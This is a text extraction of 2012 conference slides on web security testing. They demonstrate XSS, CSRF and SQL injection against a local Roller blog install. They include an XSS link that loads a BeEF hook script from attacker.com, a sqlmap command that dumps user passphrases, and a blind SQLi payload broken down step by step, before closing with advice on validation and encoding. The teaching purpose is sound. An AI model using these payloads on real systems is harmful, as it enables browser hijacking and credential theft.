security testing: thinking like an attacker · java ee web security by example 3 what you should...

T17 Track

10/4/2012 1:30:00 PM

"Security Testing: Thinking Like an

Attacker"

Presented by:

Frank Kim

ThinkSec

Brought to you by:

340 Corporate Way, Suite 300, Orange Park, FL 32073

888-268-8770 ∙ 904-278-0524 ∙ [email protected] ∙ www.sqe.com

Frank Kim ThinkSec

The founder and principal consultant with ThinkSec, Frank Kim is the curriculum lead for

application security at the SANS Institute. With more than fourteen years of experience in

software development, information technology, and security, Frank has designed, developed,

and tested applications for large healthcare, technology, insurance, and consulting companies.

He currently focuses on security strategy and application security program development with a

special interest in integrating security into the software development lifecycle. Frank is the

author of the SANS Institute's Secure Coding in Java/JEE course and a speaker at international

events.

8/27/2012

1

Security TestingThinking Like an Attacker

STARWEST 2012

Java EE Web Security By Example 2

About

• Frank Kim

– Consultant, ThinkSec

– Author, SANS Secure Coding in Java/JEE

– SANS Application Security Curriculum Lead

8/27/2012

2


What You Should Know

• Hackers are clever

• Don’t trust any data

–Assume that your users are evil!


Outline

• Web App Attack Refresher

– XSS, CSRF, SQL Injection

• Testing

– Hacking an open source app

• Wrap Up

– Finding security bugs

8/27/2012

3


Cross-Site Scripting (XSS)

• Occurs when unvalidated data is displayed back to the browser

• Types of XSS

–Stored

–Reflected

–Document Object Model (DOM) based


Tennis anyone?

8/27/2012

4


Maria Sharapova


Cross-Site Request Forgery (CSRF)

8/27/2012

5


SQL Injection (SQLi)

• Occurs when dynamic SQL queries are used

– By injecting arbitrary SQL commands, attackers can extend the meaning of the original query

– Can potentially execute any SQL statement on the database

• Very powerful

– #1 on CWE/SANS Top 25 Most Dangerous Software Errors

– #1 on OWASP Top 10


Outline



• Testing


• Wrap Up


8/27/2012

6


What are We Testing?

• Installation of Roller 3.0

• Fake install of SANS AppSec Street Fighter Blog

• Want to simulate the actions that a real attacker might take

– There are definitely other avenues of attack

– We're walking through one attack scenario


Attack Scenario

1) XSS to control the victim's browser

2) Combine XSS and CSRF to conduct a privilege escalation attack- Use escalated privileges to access another feature

3) Use SQL Injection to access the database directly

8/27/2012

7


Testing the "look" Param

• Admin pages include head.jsp

• The param is persistent for the session


XSS Exploitation

• Introducing BeEF

– Browser Exploitation Framework

– http://www.bindshell.net/tools/beef

• Uses XSS to hook the victim's browser

– Log user keystrokes, view browsing history, execute JavaScript, etc

– Advanced attacks - Metasploit integration, browser exploits, etc

8/27/2012

8


XSS Exploitation Overview

Attacker Victim

1) Sends link with evil BeEF script

http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>

2) Victim clicks evil link

3) Victim's browser sends data to attacker

BeEF XSS Demo

8/27/2012

9


Spot the Vuln - CSRF


CSRF in UserAdmin.jsp

Want to use CSRF to change

this field

8/27/2012

10

CSRF Demo


SQL Injection Testing

•UserServlet is vulnerable to SQLihttp://localhost:8080/roller/roller-ui/authoring/user

No results

8/27/2012

11


Exploiting SQL Injection

• Introducing sqlmap

– http://sqlmap.sourceforge.net

• Tool that automates detection and exploitation of SQL Injection vulns

– Supports MySQL, Oracle, PostgreSQL, MS SQL Server

– Supports blind, inband, and batch queries

– Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc

– Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc


sqlmap Syntax

� Dump userids and passwordspython sqlmap.py

-u "http://localhost:8080/roller/roller-

ui/authoring/user?startsWith=f%25"

--cookie "username=test; JSESSIONID==<INSERT HERE>"

--drop-set-cookie -p startsWith

--dump -T rolleruser -C username,passphrase -v 2

8/27/2012

12

SQL Injection Demo


How it Works

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser

LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy







8/27/2012

13


Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)),

CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal


Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS


LIMIT 2, 1), 1, 1);

returns i



LIMIT 2, 1), 2, 1);

returns l



LIMIT 2, 1), 3, 1);

returns o

8/27/2012

14


Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS


LIMIT 2, 1), 1, 1));

returns 105



LIMIT 2, 1), 2, 1));

returns 108



LIMIT 2, 1), 3, 1));

returns 111


Attack Summary

1) XSS to control the victim's browser

2) Combine XSS and CSRF to conduct a privilege escalation attack- Use escalated privileges to access another feature

3) Use SQL Injection to access the database directly

8/27/2012

15


Outline



• Testing


• Wrap Up



Application

Should I be consuming this?

Should I be emitting this?

Data Validation

Inbound Data

Outbound Data

Data Store

Validation

Encoding

Encoding

Validation

Outbound Data

Inbound Data

Validation

8/27/2012

16


Output Encoding

• Encoding– Convert characters so they are treated as data and not special characters

• Must escape differently depending where data is displayed on the page

• XSS Prevention Cheat Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet


What do Attackers Look For?

• XSS

– Unencoded data in the web page

• CSRF– Lack of random tokens in the form

– Sensitive forms that can be submitted multiple times without authorization

• SQL Injection

– Parameters that accept SQL

8/27/2012

17


Building Secure Software

Source: Microsoft SDL


Remember

• Hackers are clever

• Don’t trust any data– Think about what the system is not supposed to do

8/27/2012

18


Thanks!

Frank [email protected] @sansappsec

security testing: thinking like an attacker · java ee web security by example 3 what you should...

Documents